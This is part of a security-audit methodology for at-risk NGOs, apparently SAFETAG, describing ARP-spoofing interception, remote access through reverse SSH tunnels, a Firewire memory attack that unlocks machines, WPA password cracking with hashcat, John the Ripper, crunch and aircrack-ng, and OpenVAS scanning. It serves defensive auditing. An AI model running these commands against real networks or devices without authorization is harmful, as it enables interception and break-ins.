This attacker could be someone, such as a patron of the Internet cafe where a staff member is working, who just happens to be using the same local network to connect to the Internet. Or, she could work for an organization with privileged access to the relevant network, such as the Internet Service Provider (ISP) of either the sender or receiver and other network-backbone connections made along the way.

Overview
Materials Needed
Considerations
Walkthrough
Network Traffic Interception

Step 1: The attacker tricks the victim into routing all of his traffic through the attacker’s machine. This involves making a simple request to the victim’s IP address, which is not difficult to do. Computers are rarely configured to ignore such requests.

$ sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

$ sudo arpspoof -i wlan0 -t 192.168.1.99 192.168.1.1

Sample Output:

00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
...
00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55

In the example above, only a single victim (192.168.1.99) is being targeted, but the attack works fine against multiple victims, or even against the entire network. In other words, the attacker does not need to know which IP address (on the office or Internet cafe LAN, for example) belongs to her target. Furthermore, the victim is extremely unlikely to notice any sign that this phase of the attack is taking place.

EtterCap provides a powerful frontend to managing this process with multiple potential targets. In EtterCap:

Step 2: At this point, if the attacker is looking for unencrypted traffic, all she needs to do is launch a packet-sniffer, such as Wireshark, and scan through the intercepted traffic for specific vulnerable information, such as email or website logins, as well as traffic revealing shadow infrastructure usage, such as Dropbox.

Recommendation

Only use services with "SSL" encryption ("HTTPS"), and consider adding HTTPS Everywhere to browsers. This does not itself guarantee protection from all attacks, but it is a good first-step in protecting information (such as passwords or email) in transit from your computer to the service provider.

Remote Network and User Device Assessment

Summary

This component allows the auditor to work remotely to identify the devices on a host's network, the services that are being used by those devices, and any protections in place, as well as to assess the security of the individual devices on the network.

Overview

There can be several approaches for this exercise, depending on the scenario.

Scenario 0

The organization has contacted the auditor through an intermediary who is familiar with tech and can follow SAFETAG instructions, or the organization has a tech person among their employees.

This scenario is comparable to a situation where the auditor is on site. In this case, the auditor will instruct the intermediary or the tech person in the organization to follow the instructions in the exercise on Network mapping and on User device assessment.

Scenario 1

The organization has someone among their employees who is ready to follow simple instructions, including opening a terminal and pasting commands we will provide them.

In this scenario, the auditor will send simple instructions to the auditee, so as to be able to access the organization's network through a reverse SSH tunnel and assess the LAN and single devices from there. To run the computer used within the organization's network to establish the tunnel, a UNIX system is needed. This will be a Linux live distribution or a Mac computer.

Scenario 2

In this scenario, no one at the organization is ready to apply complex instructions. Instead of relying on an individual, the auditor will rely on tunneling into a device located in the physical space of the auditee. This can be done in two ways:

  1. Remote Desktop or remote VPN into targeted Network. Remote Desktop is tunneling into a targeted machine that lives on the same targeted LAN network where you wish to scan the network and do the device assessment; the auditor controls the machine remotely and uses it as the auditor machine.
  2. VPN to a trusted VPN server. In this case, the auditee will connect one of their machines to a trusted VPN server, and the auditor will connect to the same VPN server, allowing both LANs at the auditee's and auditor's ends to connect.
Materials Needed
Scenario 1
Scenario 2

In the case of remote desktop:

In the case of using an in-the-middle trusted VPN server:

Applications to use: TightVNC TeamViewer Windows remote desktop

Considerations
Scenario 1
Walkthrough
Scenario 0

Instruct the intermediary or the tech person in the organization to follow the instructions in the exercise on Network mapping and on User device assessment.

Scenario 1

Legend

Instruct the auditee to initiate a connection to the server (S) and set up a reverse ssh server:

Let's assume we have a server named safetag-audit.org (S), and usernames for each auditee called auditee1, auditee2, etc.

Important: make sure that the ports you use don't conflict with ports by other services or auditees, i.e. don't use a port number twice.

Once this session is open, the auditor can access the auditee's machine (C). At this point there are a few powerful options:

example:

to connect to site 0:

    ssh [email protected] -p 2200

with site 1 in the previous example, the port would be 2210 (or whatever the auditee used in her command).

An additional thing that one might want to do is making the connection from C to S passwordless and automatic (this can be accomplished with tools or scripts readily available on the internet).

WARNING: Make sure to remove/clean any persistent connections once you are done with auditing.

There should be no need for multiple reverse tunnels, as multiple forward tunnels can be set up from S to C if needed (eg. VNC or RDP); this requires multiple forward tunnels from A to S though.

Scenario 2

Legend:

Someone at the auditee's side will prepare machine A in coordination with the auditor, then install TeamViewer.

After that, and using a trusted communication method, TeamViewer ID and passcode will be sent to the Auditor.

The auditor will use the ID and passcode to connect to the machine and start using machine A as the auditing machine.

There are pros and cons for this:

Cons:

  1. Internet speed: You will need a high speed Internet connection to achieve such task, as the remote access will be transferring the desktop of the targeted machine to you in order to do the tasks.
  2. Connection interruption: While you are working remotely, you might face some connection interruptions during your session, and restarting the remote access will be a challenge because in most of the cases you will need someone at the other end to authorize you to tunnel into the machine.
  3. Physical limitations: You are still physically far from the machine, which means you cannot connect a USB drive to boot from it or do any other tasks that require you to be near the device.
  4. Installing Kali Linux might be hard: It might be hard for a non-technical person to prepare a Kali Linux machine

Pros:

  1. Usability: TeamViewer is easy to install and use. Anyone with basic knowledge on how to install software can assist you with preparing the auditing machine.
  2. Network speed: Technically, your auditing machine is the machine you are connected to, which is physically located in the targeted office and connected to the LAN network. This means that you will have full speed running your audit tasks.

Note: Some remote assistant software provides VPN solutions that turn Machine A into a VPN Server and allow Machine B to VPN into it. Tunneling into that VPN server will allow you to connect to the local LAN network, which will allow you to use Machine B to run the audit.

Using an in-the-middle trusted VPN server

Legend:

Auditee's Network --------- (A) ---------- C ---------- (B) ---------- Auditor's Network

The auditor will put efforts preparing an OpenVPN server (C) and create 2 profiles (Keys and configurations) to allow machines A and B to connect to C.

Get a VPS from your favorite and trusted VPS provider and keep in mind the physical location of the server, then install OpenVPN Server by following the instructions contained in this guide on Ubuntu Server.

The default configuration of OpenVPN will not allow the clients (A-B) to see each other on the network. To allow that, you have to enable client-to-client directive and enable your both subnets (Auditee and Auditor) to see each others networks. To do so, follow these instruction.

After finishing the installation and testing it, the auditor will pass the .ovpn file to the person at the auditee's site through a trusted way, and provide instructions on how to install and connect to the server. After connecting A and B to C, the auditor will be able to start the network and device assessment at the other end.

Note: In case the VPN is censored in A or B's countries, or in both, you can follow these instructions on how to bypass the censorship by using pluggable transports.

Recommendation

Router Attacks

Covered in full in Vulnerability Scanning and Analysis

Wireless Range Mapping

Covered in full in Network Discovery

This component consists of wireless scanning and wireless signal mapping. It is useful for organizations with offices in shared spaces/buildings/apartment complexes or near locations where an adversary could easily "listen" to network traffic. In conjuction with Monitoring Open Wireless Traffic exercise, it can also identify devices using that network. It is useful to do this in parallel with Office Mapping to build a more comprehensive view of the information assets of the organization.

Monitor Open Wireless Traffic

Covered in full in Network Discovery

Each wireless device maintains a "memory" of what networks it has successfully connected to. When it is connecting to a network, it sends out "probes" to all of the networks it has in this memory. It is important to note that this data gets broadcast widely, and can be collected without any network access, only proximity to the device.

These network probes can often contain names (especially from mobile phone tethers), organizational affiliations, device manufacturers, and a mixture of other potentially valuable data (home network names, recent airports/travel locations, cafés and conference networks). If there are many networks in the office's vicinity, this activity can also help identify the specific office network (if there is any doubt). In many cases, an organization may not want the name of their wireless network to be associated with to their organization, but it may be revealed by this additional meta-data.

Beacons can "de-anonymize" an obfuscated network name as well as provide rich content for social engineering attacks. This provides an only-lightly-invasive introduction to discuss the trackability of devices, particularly mobiles and laptops.

User Device Assessment

Summary

This component allows the auditor to assess the security of the individual devices on the network. This component consists of interviews, surveys, and inspection of devices.

Purpose

Compromised devices have the ability to undermine nearly any other organizational attempt at securing information. Knowing if devices receive basic software and security upgrades and what core protections against unauthorized access exist is vital to designing a strategy to make the host more secure.

The Flow Of Information

User Device Assessment Information Flow
User Device Assessment Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Baseline Skills

Resources

Password Security

Privilege Separation Across OS

Examining Firewalls Across OS

Identifying Software Versions

Device Encryption By OS

Anti-Virus Updates

Identifying Odd/One-Off Services

Activities

Device and Software Version Assessment

Summary

The auditor checks staff devices for updated systems and software, anti-virus and other security capabilities, and identifies software runing on computers and its current version. The auditor checks for known vulnerabilities to any out of date software.

This is used to develop a report component exposing how un-updated software can lead to large vulnerabilities.

Overview
Materials Needed
Considerations
Walkthrough

The auditor inspects a subset of key and/or representative user devices (work & personal). The auditor should focus on the work devices to limit scope creep, but if the office has many personal devices accessing organizational accounts/data, the auditor should share what "red flags" they are looking for and work in tandem with device owners and/or IT staff. For a small office, it may be possible to check every machine. For larger offices, the auditor should use a subset to get a feel for the overall security stance of user devices.

See the Appendix for a per-OS guide of where to find key data.

Recommendation
Upgrade Operating Systems

Popular operating systems like Windows XP are, sadly, no longer receiving security updates.

Move to Licensed Operating Systems

While "pirated" operating systems are extremely common (especially Windows) they often leave much to be desired in terms of security. If the OS is not receiving regular updates from the software creator, it is extremely vulnerable to thousands of potential attacks.

Update Operating Systems

Operating Systems of all varieties - Windows, Mac, Linux, and others, are constantly being updated. These updates often fix bugs, but they also protect the system from newly discovered vulnerabilities. It can seem difficult to keep updating constantly, but this is very important to protect even non-sensitive systems.

Update Vulnerable Software

Many critical software components, such as Java or Adobe Flash, have many vulnerabilities and need to be aggressively updated.

Install Anti-Virus
Move to Licensed Anti-Virus
Update Anti-Virus

Most AV tools automatically update, but this can sometimes get out of sync, or if the AV was a pre-installed trial system, it will stop updating after its trial period. An out of date anti-virus is worthless.

Install Anti-Malware scanner
Encrypt Hard Drives
Activate a personal firewall

A Day in the Life

Summary

The auditor checks staff devices for updated systems and software, anti-virus and other security capabilities, and identifies software runing on computers and its current version. The auditor checks for known vulnerabilities to any out of date software.

This is used to develop a report component exposing how un-updated software can lead to large vulnerabilities.

Overview
Materials Needed
Considerations
Walkthrough

As you work with staff members (this pairs well with the device checklist activity), also interview them about the other devices they use, and how they connect to work services - email/webmail, intra/extranet tools, Constituent Relationship Management (CRM) tools like CiviCRM or Salesforce, financial tracking tools, and website management tools.

Phone Usage
User Software and Tools
Remote Services
Recommendation

Only use services with "SSL" encryption ("HTTPS"), and consider adding HTTPS Everywhere to browsers. This does not itself guarantee protection from all attacks, but it is a good first-step in protecting information (such as passwords or email) in transit from your computer to the service provider.

Firewire Access to Encrypted/Locked computers

Summary

Firewire ports and expansion slots can be abused to obtain data that are thought to be encrypted

Any attacker who obtains a running (including sleeping and hibernating!) Windows, Mac, or even Linux laptop with a Firewire port, an ExpressCard expansion slot, or a Thunderbolt port will be able to read, record or modify any sensitive information on the device, even if the screen is “locked” and the information is stored on an encrypted volume or in an encrypted folder. This applies to threats involving loss, theft and confiscation, but also to “checkpoint” scenarios in which the attacker may only have access for a few minutes.

This attack requires physical control of a machine that is not powered off. Full details of the scope of the attack are available at http://www.breaknenter.org/projects/inception/ .

Overview
Materials Needed
Considerations
Walkthrough

Firewire ports and expansion slots can be abused to obtain data that are thought to be encrypted

The threat describe in this section is more complex than it needs to be. In fact, unencrypted data are vulnerable to any number of simple attacks, the two most straightforward being: 1) rebooting the computer from a USB stick CD-ROM or DVD containing an alternate operating system, then copying all of the data; or 2) removing the hard drive, inserting it into a different machine, then copying all of the data. These techniques, which work on nearly any computer, even if a strong login password has been set, are effective and widely used, but they require extended physical access to the device. A slightly different attack is described below, one that only requires physical access for a few minutes. It, too, works regardless of login/screen-lock passwords, though only devices with Firewire ports or expansion slots (ExpressCard, CardBus, PCMCIA, etc.) are vulnerable.

The steps required to defend against all of these threats is the same: encrypt your data using a tool like Microsoft’s BitLocker, Apple’s FileVaule or the open-source Truecrypt application. The Firewire attack highlighted here is particularly illustrative, however, because it serves as a reminder that merely setting up an encrypted volume is not enough. In much the same way that a lock does little to protect your home if the door to which it is attached remains open, data encryption is rarely effective while you are logged into your computer. Even if the screen is locked (which would foil the “reboot” and “hard drive removal” attacks described briefly above), an attacker may still find a way to access your sensitive data, while the computer is up and running, because the decryption key is present in the computer’s memory. (This is how large-scale encryption actually works. Information remains encrypted at all times, on the storage device where it lives, but you are able to access it while you are logged in, or while your encrypted volume is “open,” because your computer decrypts and encrypts it on the fly.) Walkthrough

Step 1: First, the attacker would connect her computer to the victim’s using a Firewire cable. Either or both machines could be using a true Firewire port or a Firewire expansion card. When a Firewire ExpressCard expansion card is inserted, Windows automatically installs and configures the necessary drivers, even if nobody is logged into the laptop.

Step 2: Once connected, the attacker simply runs the Inception tool, selects the operating system of the target machine and waits a minute or two for the attack to complete (depending on the amount of RAM present):

$ incept

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.2.0 (C) Carsten Maartmann-Moe 2012
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

[*] FireWire devices on the bus (names may appear blank):
--------------------------------------------------------------------------------
[1] Vendor (ID): MICROSOFT CORP. (0x50f2) | Product (ID):  (0x0)
--------------------------------------------------------------------------------
[*] Only one device present, device auto-selected as target
[*] Selected device: MICROSOFT CORP.
[*] Available targets:
--------------------------------------------------------------------------------
[1] Windows 8: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[2] Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[3] Windows Vista: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[4] Windows XP: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[5] Mac OS X: DirectoryService/OpenDirectory unlock/privilege escalation
[6] Ubuntu: libpam unlock/privilege escalation
--------------------------------------------------------------------------------
[!] Please select target (or enter 'q' to quit): 2
[*] Selected target: Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[*] Initializing bus and enabling SBP-2, please wait  1 seconds or press Ctrl+C
[*] DMA shields should be down by now. Attacking...
[*] Searching, 1328 MiB so far
[*] Signature found at 0x8b50c321 (in page # 570636)
[*] Write-back verified; patching successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

In the case of the laptops tested, Inception took approximately two minutes to reach the final, somewhat self-congratulatory line shown above. At that point, we were able to login using any password. (Entering “asdf” worked just fine, and gave us full access to all data on the computer.) Inception works by temporarily replacing authentication code using the Firewire’s protocol’s direct memory access (DMA). After a reboot, everything is restored to its original state.

Once again, it is worth noting that successful mitigation of this issue requires a combination of technology (data encryption) and some level of behavior change (shutting down laptops at the end of the day, when traveling and at any time when confiscation, theft, loss or tampering are particularly likely.)

Material that may be Useful:
Recommendation

Password Security Survey

Summary

Weak Passwords

Weak and "shared" passwords are prevalent - even after hundreds of well-publicized global password breaches, "password" and "12345" remain the most popular passwords. Weak wifi passwords are specifically a challenge, as wifi signals often are accessible outside of an office's physical limits, but provide full access to the private network.

Overview
Materials Needed
Considerations
Walkthrough

This exercise supports the auditor in building an effective dictionary that is customized to an organization.

This dictionary can then be used in a variety of ways:

Walkthrough

This skillset, plus demonstration against non-invasive accounts, provides an opening for a discussion with staff on password security. See Level Up for further activities and exercises around passwords.

Instructions

This component provides resources and recommendations on cracking passwords - both the creation of dictionaries and rules to modify those dictionaries, as well as some basic implementation as well. This is a dangerous (and in many cases, illegal) skill to use, and should be more of a guide to auditors on what password security myths do not work against modern password cracking software, and to use only with permission and only in very specific situations as a demonstration of the power of even a common laptop against weak passwords.

Primarily for use in the Network Access component, building a password dictionary, understanding the ways to automatically mutate it, and running it against passwords is a useful skill to have, and to use to explain why simple passwords are insecure. This Ars Technica article provides a good insight into the path to tackle iterative password cracking using a variety of tools to meet different goals.

These instructions use a small set of password cracking tools, but many are possible. If there are tools you are more familiar or comfortable with using, these by no means are required. The only constraints are to be respectful and responsible, as well as keeping focused on the overall goals and not getting bogged down.

A good wordlist with a few tweaks tends to break most passwords. Using a collection of all English words, all words from the language of the organization being audited, plus a combination of all these words, plus relevant keywords, addresses, and years tends to crack most wifi passwords in a reasonable timeframe.

An approach which begins with quick, but often fruitful, attacks to more and more complex (and time consuming) attacks is the most rewarding. However, after an hour or two of password hacking, the in-office time on other activities is more valuable, so admit defeat and move on. See the Recommendations section for talking points around the levels of password cracking that exist in the world. You can work on passwords offline/overnight/post-audit for report completeness.

Here is a suggested path to take with suggested tools to help. You might try the first few steps in both the targeted keyword approach and the dictionary approach before moving on to the more complex mutations towards the end of each path.

Dictionary Research and Creation

Before you arrive on-site it is important to have your password cracking tools downloaded and relevant dictionaries ready to go, as your main demonstration and use of these tools is to gain access to the organization's network. The effectiveness of this demonstration is drastically reduced if you already have had to ask for the password to connect to the Internet and update your dictionaries, tools, or so on. Some of these files (especially larger password dictionaries) can be quite large, so downloading them in-country is not recommended.

Many password dictionary sites, such as SkullSecurity , maintain core dictionaries in multiple languages. If your target language is not available, some quick regular expression work can turn spell-check dictionaries (such as those used by LibreOffice into useful word lists. It is generally useful to always test with English in addition to the target language.

CloudCracker and OpenWall have, for a fee, well-tested password dictionaries.

Keyword generation

In addition, create a customized dictionary with words related to the subject as revealed in the Remote Assessment research: organization name, street address, phone number, email domain, wireless network name, etc. For the organization "ExampleOrg , which has its offices at 123 Central St., Federal District, Countryzstan , which does human rights and journalism work and was founded in 1992, some context-based dictionary additions would be:

exampleorg
example
exa
mple
org
123
central
federal
district
countryzstan
human
rights
journo
journalism
1992
92

Also add common password fragments: qwerty, 1234/5/6/7/8, and, based on field experience, four-digit dates back to the year 2001 (plus adding in the founding year of the organization). It's also useful to see what calendar system is in use at your organization's location as some cultures don't use Gregorian years. It's quite amazing how often a recent year will be part of a wifi password -- this presentation discusses many common patterns in passwords: https://www.owasp.org/images/a/af/2011-Supercharged-Slides-Redman-OWASP-Feb.pdf

Optional Further steps

Use CeWL, to spider the organization's web properties to generate additional phrases. This list will need review, as some of the generated content is not very useful, but may be useful if the site is not in a language the auditor reads fluently.

For passwords other than WPA, specific policies or patterns may help to focus your password dictionary further. PACK, or Password Analysis and Cracking Toolkit is a collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics. The toolkit generates valid input files for Hashcat family of password crackers." PACK is most useful for large sets of passwords, where it can detect patterns in already-broken passwords to help build new rules. Both password cracking tools listed here are powerful, and have slightly different abilities. The auditor should choose the one they prefer and/or the one which has the features they desire for this job.

Combinator Attack with scripting and Hashcat

One quick way to build a more complex password list is to simply double the list up (a "combinator" attack), so that it includes an entry for each pair of these strings:

You can do a 1-way version of this list simply, such as:

 $ for foo in `cat pwdlist.txt`; do for bar in `cat pwdlist.txt`; do printf $foo$bar'\n'; done; done > pwdpairs.txt
 $ cat pwdlist.txt >> pwdpairs.txt

Hashcat can do this in a live attack under its "combinator" mode, and hashcat-utils (hiding in /usr/share/hashcat-utils/combinator.bin) provides this as a standalone tool. This provides a true combination of the list, so it exponentially increases the list size - use with caution, or use with one larger dictionary and one smaller dictionary.

For example, use these combination approach on your custom dictionary (combining it with itself, creating combinations from the above list such as example92, journorights, exampleorgrights).

$  /usr/share/hashcat-utils/combinator.bin dict.txt dict.txt

Hashcat is extremely powerful when you have desktop computer systems to use, but has a few wordlist manipulation tools that are useful regardless.

More References: (http://hashcat.net/wiki/doku.php?id=cracking_wpawpa2 , http://www.darkmoreops.com/2014/08/18/cracking-wpa2-wpa-with-hashcat-kali-linux/ )

Word mutation with John the Ripper (JtR)

JtR is a powerful tool you can use in combination of existing wordlists, but it also can add in common substitutions (people using zero for the letter "o"). JtR can be used to generate a static list of passwords for other programs, or it can be used directly against a password database. JtR is a bit weak combining words within a wordlist, so you should apply your customizations and any folding before moving on to JtR.

You can add custom "rules" to aid in these substitutions - a base set is included with JtR, but a much more powerful set is added by [KoreLogic] (http://contest-2010.korelogic.com/rules.html). KoreLogic also provides a custom character set "chr file" that takes password frequency data from large collections of real-world passwords to speed up JtR's brute force mode . This PDF presentation has a good walkthrough of how John and Kore's rules work

Additional guides: * (http://linuxconfig.org/password-cracking-with-john-the-ripper-on-linux)

The bleeding-edge jumbo version combines both the built-in rules and an optimized version of the KoreLogic rules. This list of KoreLogic Rules provides nice descriptions of what the KoreLogic rules do. In bleeding-jumbo, you can remove "KoreLogicRules". BackReference provides a great example of rules usage.

Some particularly useful ones individual rulesets are: * AppendYears (appends years, from 1900 to 2019) and AppendCurrentYearSpecial (appends 2000-2019 with punctuation) * AddJustNumbers (adds 1-4 digits to the end of everything) * l33t (leet-speek combinations)

There are some build-in combinations of rulesets - for example, just --rules runs john's internal collection of default rules, and --rules:KoreLogic runs a collection of the KoreLogic rules in a thoughtful order, and --rules:all is useful if you hate life.

e.g. :

  $ john -w:dictionary.txt --rules:AppendYears --stdout

Building custom rules

PROTIP Create a dictionary with just "blah" and run various rules against it to understand how each ruleset or combination works. Note specifically that each rule multiplies the size of the dictionary by the number of permutations it introduces. Running the KoreLogic ruleset combination against a one word dictionary creates a list of 6,327,540 permutations on just that word.

Brute force, using John and crunch

JtR's "incremental" mode is essentially an optimized brute force attack, so will take a very long time for anything but the shortest passwords, or passwords where you can limit the search space to a character set: "As of version 1.8.0, pre-defined incremental modes are "ASCII" (all 95 printable ASCII characters), "LM_ASCII" (for use on LM hashes), "Alnum" (all 62 alphanumeric characters), "Alpha" (all 52 letters), "LowerNum" (lowercase letters plus digits, for 36 total), "UpperNum" (uppercase letters plus digits, for 36 total), "LowerSpace" (lowercase letters plus space, for 27 total), "Lower" (lowercase letters), "Upper" (uppercase letters), and "Digits" (digits only). The supplied .chr files include data for lengths up to 13 for all of these modes except for "LM_ASCII" (where password portions input to the LM hash halves are assumed to be truncated at length 7) and "Digits" (where the supplied .chr file and pre-defined incremental mode work for lengths up to 20). Some of the many .chr files needed by these pre-defined incremental modes might not be bundled with every version of John the Ripper, being available as a separate download." (http://www.openwall.com/john/doc/MODES.shtml)

As a last resort, you can try a direct brute force attack overnight or post-audit to fill in details on key strength. Crunch is a very simple but thorough approach. Given enough time it will break a password, but it's not particularly fast, even at simple passwords. You can reduce the scope of this attack (and speed it up) if you have a reason to believe the password is all lower-case, all-numeric, or so on. WPA passwords are a minimum of 8 characters, a maximum of 16, and some wifi routers will accept punctuation, but in practice these are usually just [email protected]#$. — so:

$ /path/to/crunch 8 16 a[email protected]#$. | aircrack-ng -a 2 path/to/capture.pcap -b 00:11:22:33:44:55 -w -

This says to try every possible alpha-numeric combination from 8 to 16 characters. This will take a very, very, very long time.

Recommendations

Any important password should be long enough and complex enough to prevent both standard dictionary attacks and “brute-force attacks” in which clusters of powerful computers work in parallel to test every possible character combination. (We recommend 12 or more completely random characters or a passphrase that contains five or more relatively uncommon words.) The key should not contain common “phrases,” expecially from well known literature like Shakespeare or religious texts, but also should not include number sequences or phrases, especially if they are related to the organization, its employees or its work.

Specifically for wireless passwords, choosing a strong WPA key is one of the most ild not mportant steps toward defending an organization’s network perimeter from an adversary with the ability to spend some time in the vicinity of the offices. By extension, mitigating this vulnerability is critical to the protection of employees and partners (and confidential data) from the sort of persistent exposure that eventually brings down even the most well-secured information systems.

Because shared keys inevitably end up being written on whiteboards, given to office visitors and emailed to partners, the WPA key should also be changed periodically. This does not have to happen frequently, but anything less than three or four times per year may be unsafe.

Material that may be Useful:

Sample Practice For practice on any of these methods, you can use the wpa-Induction.pcap file from Wireshark.

Resources

https://www.schneier.com/blog/archives/2014/03/choosing_secure_1.html

http://zed0.co.uk/crossword/

http://www.instantcheckmate.com/crimewire/is-your-password-really-protecting-you/#lightbox/0/

Note that password cracking systems are rated on the number of password guesses they make per second. Stock laptop computers without high-end graphics cards or any other optimizations can guess 2500 passwords/second. More powerful desktop computers can test over a hundred million each second, and with graphics cards (GPUs) that rises to billions of passwords per second. (https://en.wikipedia.org/wiki/Password_cracking).

This website has a good explanation about how improving the complexity of a password affects how easy it is to break: http://www.lockdown.co.uk/?pg=combi, but is using very out of date numbers - consider a basic laptop able to produce "Class E" attacks, and a desktop, "Class F"

http://rumkin.com/tools/password/passchk.php

http://cyber-defense.sans.org/blog/downloads/ has a calculator buried in the zip file "scripts.zip"

http://www.dailymail.co.uk/sciencetech/article-2331984/Think-strong-password-Hackers-crack-16-character-passwords-hour.html

https://www.grc.com/haystack.htm

https://www.owasp.org/images/a/af/2011-Supercharged-Slides-Redman-OWASP-Feb.pdf

http://www.nytimes.com/2014/11/19/magazine/the-secret-life-of-passwords.html?_r=1

Recommendation
Materials that may be useful

Password Survey

How many passwords do you have to remember for accounts and devices used to do your work?

If you tried to login to your computer account right now, how many attempts do you think it would take?

To how many people have you given your current password?

Have you ever forgotten your current password?

If yes, how did you recover it?

Have you ever forgotten old work passwords?

If yes, how did you recover it?

When you created your current password, which of the following did you do?

Did you use any of the following strategies to create your current password (choose all that apply) ?

How long is your current password (total number of characters)?

What symbols (characters other than letters and numbers) are in your password?

How many lower-case letters are in your current password?

How many upper-case letters are in your current password?

In which positions in your password are the numbers?

In which positions in your password are the symbols?

Have you written down your current password?

If you wrote down your current password how is it protected (choose all that apply) ?

Do you have a set of passwords you reuse in different places?

Do you have a password that you use for different accounts with a slight modification for each account?

Physical Security Guided Tour

Covered in full in Operational Security Assessment:

Have your point of contact walk you around the office (often as part of introductions on the first day) - mentally note physical security concerns. Document how difficult it would be for a visitor or after-hours break-in to access sensitive systems. Identify physical assets with sensitive content, such as:

This can be done remotely via secure videoconference over a smartphone or tablet that can moved around the office easily.

Combining this activity with Office Mapping helps to reduce the awkwardness of taking notes while walking around the office, and if being done remotely, the two separate activities can be used to cross-verify the accuracy of each.

Vulnerability Scanning and Analysis

Summary

This component has the auditor discover possible flaws the organization's devices, services, application designs, and networks by testing and comparing them against a variety of online and offline resources (vulnerability databases, vendor advisories, and auditor investigation) to identify known vulnerabilities. Basic vulnerability analysis should be occurring along-side the other activities so that evidence can be gathered from the network, however, deeper research into specific discovered exploits can happen after the on-site audit to fully take advantage of the short time the auditor has on site.

Purpose

It is not uncommon for a cash-strapped human rights NGO to outsource most of its IT infrastructure to a cloud provider, such as Google Apps, or to ad-hoc services (Dropbox, Yahoo! mail, Wordpress, etc.). A better-resourced organization may be more likely to host its critical services at a remote data center, but not have someone designated to update and patch systems as vulnerabilities are released, or to view the services from a security -- as opposed to availability -- standpoint.

The Flow Of Information

Vulnerability Analysis Information Flow
Vulnerability Analysis Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Baseline Skills

Resources

Vulnerability Databases

Website Vulnerability Scanning

System Vulnerability Scanning

Activities

Vulnerability Scanning

Summary

While much of SAFETAG focuses on digital security challenges within and around the office, remote attacks on the organization's website, extranets, and unintended information available from "open sources" all pose real threats and deserve significant attention. SAFETAG takes great care to take a very passive approach to this work, especially when done off-site, so as not to have unintended consequences on the organization's infrastructure or undermine operational security concerns.

This activity uses active research and scanning to detect known vulnerabilities in external and key internal services. Usually penetration tests exploit possible vulnerabilities to confirm their existence. 62 But, the use of exploits puts the organization's systems at a level of increased risk 63 that is unacceptable when neither the organization nor the auditor has the time or finances to address the issue. The SAFETAG methodology only uses relatively safe exploitation of vulnerabilities for targeted outcomes. For instance, cracking the wireless access point password allows us to demonstrate the importance of good passwords without singling out any individual's passwords. 64

Overview
Materials Needed
Considerations
Walkthrough
Setting up OpenVAS in Kali
openvas initial setup
openvas feed update
openvas check setup
openvas stop
openvas start

Visit https://127.0.0.1:9392/ in a web browser and log in.

Using OpenVAS

Once logged in to OpenVAS, the interface is disturbingly simple to use. For most use, using the Wizard to scan the target server works best. Things to verify before doing so:

Once you start a scan, change the display to "auto refresh" to give you more feedback on the scan process. Once the scan is completed, a report can be exported in PDF form.

Common problems

Errors during openvas-start

OpenVAS is a rather ... delicate program. Most often, the openvas-start script will not wait long enough between launching openvassd and openvasmd, causing openvasmd to error out. Re-running openvasmd often works, though an entire stop/start cycle seems to be slightly more reliable. Often, openvasmd will error out, but launch anyway. Checking the web interface at https://127.0.0.1:9392 to make sure that you can log in is the best way to check if it's actually successfully launched.

Lost admin password From a root command-line, you can reset the web interface's admin password:

openvasmd --create-user=admin
openvasmd --user=admin --new-password=admin

openvasmd will never launch The below applies to OpenVAS 7

In many fresh install cases, the openVAS self-signed CA certificate is set to an invalid date, which also causes openvasmd to error out. The check-setup script will recommend rebuilding the database, but the /var/log/openvas/openvasmd.log may have errors discussing certificate errors. If this is the case, try:

rm /var/lib/openvas/CA/*
rm /var/lib/openvas/private/CA/*
openvas-mkcert
openvas-mkcert-client -n -i
openvas-check-setup
openvas-start
openvasmd --rebuild
openvas-stop
openvas-start
Recommendation

The auditor will need to do research and compare against the organization's capacity and risks to give specific recommendations based on the vulnerabilities discovered in the process. Some common recommendations include the following:

Out of Date Content Manangement System

Most popular CMS platforms provide emailed alerts and semi-automated ways to update their software. Make sure someone responsible for the website is either receiving these emails or checking regularly for available updates. Security updates should be applied immediately. It is a best practice however to have a “test” site where you can first deploy any CMS update before attempting it on a production site.

For custom CMS systems, it is strongly advisable to migrate to a more standard, open source system.

An increasingly good practice is for organizations to take advantage of the "free" tiers of DDoS mitigation services, of which CloudFlare is probably the best known. A challenge of these free services can be that they have definite limits to their protection. With CloudFlare, organizations can request to be a part of their Project Galileo program to support at-risk sites even beyond their normal scope of support.

A community-based, open source alternative is Deflect, which is completely free for eligible sites.

Some of these services will be revealed by BuiltWith, but checking the HTTP Response Headers (in Chromium/Chrome, available under the Inspect Element tool, or by using Firebug in Firefox. See Deflect's wiki for more information.

Guide for NGOs about DDoS: Digital First Aid Kit

Insecure Website Login

